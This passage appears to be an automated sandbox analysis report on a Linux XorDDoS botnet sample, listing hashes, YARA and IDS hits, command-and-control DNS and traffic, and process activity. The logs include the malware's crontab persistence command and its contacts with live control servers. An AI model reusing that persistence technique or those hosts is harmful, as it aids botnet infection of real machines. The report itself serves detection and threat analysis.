                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/vnihfmehfy, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/vnihfmehfy, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/vnihfmehfy, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/vnihfmehfy, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548649
                                                                              Entropy (8bit):6.197590102089639
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojG:/fUywKQ7Fb1pNL/p52fjQn36EuG
                                                                              MD5:890231C9558B66F036F3C8F7CEBB5D72
                                                                              SHA1:92879087E2123F34D9D516F94BA14F7DF40EA562
                                                                              SHA-256:00FFE5D1A0A57BE1E33F98B8291A7BBD0F38C8563F51614ACDE1249866A3995B
                                                                              SHA-512:A4187CFC45C7EC7CA9E4156355C6F4FA1A05926A699D538E9209B18E6CBCC0E9FD2361C6213E0796EE34F7CBD640234E2054EE25E6D46BDE6118E976A93DF41D
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wutujskjnm, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wutujskjnm, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wutujskjnm, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wutujskjnm, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548638
                                                                              Entropy (8bit):6.197538131219834
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojh:/fUywKQ7Fb1pNL/p52fjQn36Euh
                                                                              MD5:22CD21F5CFC3EA409F3A05585D903949
                                                                              SHA1:D48C82B3CE4460930518A924A51BAB5C496B38B0
                                                                              SHA-256:004FEC424E843FF98113F97BDE2D6717F99975A2504AB3EFA42C12474A62D828
                                                                              SHA-512:3BE30393B65E4C1279EA8F3E076C6538701EB178148A0D546A391AB9D0741C99DEB707A1BC051FB5EEC26B25877499A0069950DC8EB1302F598492EA070E1BF9
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/lib/libudev.so, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/lib/libudev.so, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                              Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                              File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Entropy (8bit):6.197538131219834
                                                                              TrID:
                                                                              • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                              • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                              File name:UDMp3dZ7nc.elf
                                                                              File size:548'638 bytes
                                                                              MD5:22cd21f5cfc3ea409f3a05585d903949
                                                                              SHA1:d48c82b3ce4460930518a924a51bab5c496b38b0
                                                                              SHA256:004fec424e843ff98113f97bde2d6717f99975a2504ab3efa42c12474a62d828
                                                                              SHA512:3be30393b65e4c1279ea8f3e076c6538701eb178148a0d546a391ab9d0741c99deb707a1bc051fb5eec26b25877499a0069950dc8eb1302f598492ea070e1bf9
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojh:/fUywKQ7Fb1pNL/p52fjQn36Euh
                                                                              TLSH:F0C45C56E283E2F7C82705B0134BF7BF4620B6359461CD86B7989D5AB9338F22A4D353
                                                                              File Content Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts.......................... ... ................I..............@...........Q.td........................................GNU.................U......5...

                                                                              ELF header

                                                                              Class:ELF32
                                                                              Data:2's complement, little endian
                                                                              Version:1 (current)
                                                                              Machine:Intel 80386
                                                                              Version Number:0x1
                                                                              Type:EXEC (Executable file)
                                                                              OS/ABI:UNIX - System V
                                                                              ABI Version:0
                                                                              Entry Point Address:0x8048110
                                                                              Flags:0x0
                                                                              ELF Header Size:52
                                                                              Program Header Offset:52
                                                                              Program Header Size:32
                                                                              Number of Program Headers:5
                                                                              Section Header Offset:547576
                                                                              Section Header Size:40
                                                                              Number of Section Headers:26
                                                                              Header String Table Index:25
                                                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                              NULL0x00x00x00x00x0000
                                                                              .note.ABI-tagNOTE0x80480d40xd40x200x00x2A004
                                                                              .initPROGBITS0x80480f40xf40x170x00x6AX004
                                                                              .textPROGBITS0x80481100x1100x681f80x00x6AX0016
                                                                              __libc_freeres_fnPROGBITS0x80b03100x683100x100f0x00x6AX0016
                                                                              __libc_thread_freeres_fnPROGBITS0x80b13200x693200x1db0x00x6AX0016
                                                                              .finiPROGBITS0x80b14fc0x694fc0x1c0x00x6AX004
                                                                              .rodataPROGBITS0x80b15200x695200x152e00x00x2A0032
                                                                              __libc_subfreeresPROGBITS0x80c68000x7e8000x300x00x2A004
                                                                              __libc_atexitPROGBITS0x80c68300x7e8300x40x00x2A004
                                                                              __libc_thread_subfreeresPROGBITS0x80c68340x7e8340x80x00x2A004
                                                                              .eh_framePROGBITS0x80c683c0x7e83c0x60a00x00x2A004
                                                                              .gcc_except_tablePROGBITS0x80cc8dc0x848dc0x11b0x00x2A001
                                                                              .tdataPROGBITS0x80cd9f80x849f80x140x00x403WAT004
                                                                              .tbssNOBITS0x80cda0c0x84a0c0x2c0x00x403WAT004
                                                                              .ctorsPROGBITS0x80cda0c0x84a0c0x80x00x3WA004
                                                                              .dtorsPROGBITS0x80cda140x84a140xc0x00x3WA004
                                                                              .jcrPROGBITS0x80cda200x84a200x40x00x3WA004
                                                                              .data.rel.roPROGBITS0x80cda240x84a240x2c0x00x3WA004
                                                                              .gotPROGBITS0x80cda500x84a500x80x40x3WA004
                                                                              .got.pltPROGBITS0x80cda580x84a580xc0x40x3WA004
                                                                              .dataPROGBITS0x80cda800x84a800xb400x00x3WA0032
                                                                              .bssNOBITS0x80ce5c00x855c00x67780x00x3WA0032
                                                                              __libc_freeres_ptrsNOBITS0x80d4d380x855c00x140x00x3WA004
                                                                              .commentPROGBITS0x00x855c00x4220x00x0001
                                                                              .shstrtabSTRTAB0x00x859e20x1160x00x0001
                                                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                              LOAD0x00x80480000x80480000x849f70x849f76.20400x5R E0x1000.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
                                                                              LOAD0x849f80x80cd9f80x80cd9f80xbc80x73543.66490x6RW 0x1000.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
                                                                              NOTE0xd40x80480d40x80480d40x200x201.74870x4R 0x4.note.ABI-tag
                                                                              TLS0x849f80x80cd9f80x80cd9f80x140x402.66100x4R 0x4.tdata .tbss
                                                                              GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2025-01-03T15:27:53.413618+01002021326ET MALWARE Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org)1192.168.2.23514528.8.8.853UDP
                                                                              2025-01-03T15:27:53.413618+01002020381ET MALWARE DDoS.XOR Checkin1192.168.2.2355858137.175.90.2131522TCP
                                                                              2025-01-03T15:27:53.421515+01002021326ET MALWARE Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org)1192.168.2.23390788.8.4.453UDP
                                                                              2025-01-03T15:27:53.433409+01002021326ET MALWARE Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org)1192.168.2.23334051.1.1.153UDP
                                                                              2025-01-03T15:27:53.472788+01002020381ET MALWARE DDoS.XOR Checkin1192.168.2.2355858137.175.90.2131522TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 3, 2025 15:27:53.429117918 CET558581522192.168.2.23137.175.90.213
                                                                              Jan 3, 2025 15:27:53.433916092 CET152255858137.175.90.213192.168.2.23
                                                                              Jan 3, 2025 15:27:53.433978081 CET558581522192.168.2.23137.175.90.213
                                                                              Jan 3, 2025 15:27:53.467979908 CET558581522192.168.2.23137.175.90.213
                                                                              Jan 3, 2025 15:27:53.472758055 CET152255858137.175.90.213192.168.2.23
                                                                              Jan 3, 2025 15:27:53.472788095 CET558581522192.168.2.23137.175.90.213
                                                                              Jan 3, 2025 15:27:53.477600098 CET152255858137.175.90.213192.168.2.23
                                                                              Jan 3, 2025 15:27:54.012259007 CET152255858137.175.90.213192.168.2.23
                                                                              Jan 3, 2025 15:27:54.012320042 CET558581522192.168.2.23137.175.90.213
                                                                              Jan 3, 2025 15:27:55.136070967 CET43928443192.168.2.2391.189.91.42
                                                                              Jan 3, 2025 15:28:00.511435032 CET42836443192.168.2.2391.189.91.43
                                                                              Jan 3, 2025 15:28:02.047092915 CET4251680192.168.2.23109.202.202.202
                                                                              Jan 3, 2025 15:28:16.125193119 CET43928443192.168.2.2391.189.91.42
                                                                              Jan 3, 2025 15:28:26.363775969 CET42836443192.168.2.2391.189.91.43
                                                                              Jan 3, 2025 15:28:32.506829977 CET4251680192.168.2.23109.202.202.202
                                                                              Jan 3, 2025 15:28:55.031683922 CET558581522192.168.2.23137.175.90.213
                                                                              Jan 3, 2025 15:28:55.037085056 CET152255858137.175.90.213192.168.2.23
                                                                              Jan 3, 2025 15:28:57.079428911 CET43928443192.168.2.2391.189.91.42
                                                                              Jan 3, 2025 15:29:17.556569099 CET42836443192.168.2.2391.189.91.43
                                                                              Jan 3, 2025 15:29:56.463236094 CET558581522192.168.2.23137.175.90.213
                                                                              Jan 3, 2025 15:29:56.468161106 CET152255858137.175.90.213192.168.2.23
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 3, 2025 15:27:53.413618088 CET5145253192.168.2.238.8.8.8
                                                                              Jan 3, 2025 15:27:53.421425104 CET53514528.8.8.8192.168.2.23
                                                                              Jan 3, 2025 15:27:53.421514988 CET3907853192.168.2.238.8.4.4
                                                                              Jan 3, 2025 15:27:53.421700954 CET5336753192.168.2.238.8.8.8
                                                                              Jan 3, 2025 15:27:53.429017067 CET53533678.8.8.8192.168.2.23
                                                                              Jan 3, 2025 15:27:53.433044910 CET53390788.8.4.4192.168.2.23
                                                                              Jan 3, 2025 15:27:53.433408976 CET3340553192.168.2.231.1.1.1
                                                                              Jan 3, 2025 15:27:53.448013067 CET53334051.1.1.1192.168.2.23
                                                                              Jan 3, 2025 15:27:53.448136091 CET3340553192.168.2.231.1.1.1
                                                                              Jan 3, 2025 15:27:53.454808950 CET53334051.1.1.1192.168.2.23
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jan 3, 2025 15:27:53.413618088 CET192.168.2.238.8.8.80x56e6Standard query (0)aa.hostasa.orgA (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.421514988 CET192.168.2.238.8.4.40xa3c7Standard query (0)aa.hostasa.orgA (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.421700954 CET192.168.2.238.8.8.80xecf6Standard query (0)ppp.gggatat456.comA (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.433408976 CET192.168.2.231.1.1.10xd826Standard query (0)aa.hostasa.orgA (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.448136091 CET192.168.2.231.1.1.10xd826Standard query (0)aa.hostasa.orgA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jan 3, 2025 15:27:53.421425104 CET8.8.8.8192.168.2.230x56e6Name error (3)aa.hostasa.orgnonenoneA (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com137.175.90.213A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com107.149.213.17A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com107.149.213.19A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com107.149.213.21A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com137.175.90.211A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com198.2.208.58A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com137.175.90.210A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com198.2.208.61A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com198.2.208.59A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com198.2.208.57A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com137.175.90.212A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com137.175.90.209A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com198.2.208.60A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com107.149.213.20A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.429017067 CET8.8.8.8192.168.2.230xecf6No error (0)ppp.gggatat456.com107.149.213.18A (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.433044910 CET8.8.4.4192.168.2.230xa3c7Name error (3)aa.hostasa.orgnonenoneA (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.448013067 CET1.1.1.1192.168.2.230xd826Name error (3)aa.hostasa.orgnonenoneA (IP address)IN (0x0001)false
                                                                              Jan 3, 2025 15:27:53.454808950 CET1.1.1.1192.168.2.230xd826Name error (3)aa.hostasa.orgnonenoneA (IP address)IN (0x0001)false

                                                                              System Behavior

                                                                              Start time (UTC):14:27:52
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:/tmp/UDMp3dZ7nc.elf
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:52
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:52
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:52
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:52
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:52
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/sbin/update-rc.d
                                                                              Arguments:update-rc.d UDMp3dZ7nc.elf defaults
                                                                              File size:3478464 bytes
                                                                              MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                              Start time (UTC):14:27:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/sbin/update-rc.d
                                                                              Arguments:-
                                                                              File size:3478464 bytes
                                                                              MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                              Start time (UTC):14:27:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/bin/systemctl
                                                                              Arguments:systemctl daemon-reload
                                                                              File size:996584 bytes
                                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                              Start time (UTC):14:27:52
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:52
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/bin/sh
                                                                              Arguments:sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
                                                                              File size:129816 bytes
                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                              Start time (UTC):14:27:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/bin/sh
                                                                              Arguments:-
                                                                              File size:129816 bytes
                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                              Start time (UTC):14:27:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/bin/sed
                                                                              Arguments:sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
                                                                              File size:121288 bytes
                                                                              MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/oigyzaiygp
                                                                              Arguments:/usr/bin/oigyzaiygp ifconfig 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:62c3a5bb687fbbf7c6618bea4daadf29

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/oigyzaiygp
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:62c3a5bb687fbbf7c6618bea4daadf29

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/oigyzaiygp
                                                                              Arguments:/usr/bin/oigyzaiygp pwd 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:62c3a5bb687fbbf7c6618bea4daadf29

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/oigyzaiygp
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:62c3a5bb687fbbf7c6618bea4daadf29

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/oigyzaiygp
                                                                              Arguments:/usr/bin/oigyzaiygp "cat resolv.conf" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:62c3a5bb687fbbf7c6618bea4daadf29

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/oigyzaiygp
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:62c3a5bb687fbbf7c6618bea4daadf29

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/oigyzaiygp
                                                                              Arguments:/usr/bin/oigyzaiygp gnome-terminal 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:62c3a5bb687fbbf7c6618bea4daadf29

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/oigyzaiygp
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:62c3a5bb687fbbf7c6618bea4daadf29

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/oigyzaiygp
                                                                              Arguments:/usr/bin/oigyzaiygp "netstat -an" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:62c3a5bb687fbbf7c6618bea4daadf29

                                                                              Start time (UTC):14:27:58
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/oigyzaiygp
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:62c3a5bb687fbbf7c6618bea4daadf29

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/sosfbbrzmx
                                                                              Arguments:/usr/bin/sosfbbrzmx ifconfig 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:01fd1f9249b1844a8c8d2d32cedc38b7

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/sosfbbrzmx
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:01fd1f9249b1844a8c8d2d32cedc38b7

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/sosfbbrzmx
                                                                              Arguments:/usr/bin/sosfbbrzmx sh 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:01fd1f9249b1844a8c8d2d32cedc38b7

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/sosfbbrzmx
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:01fd1f9249b1844a8c8d2d32cedc38b7

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
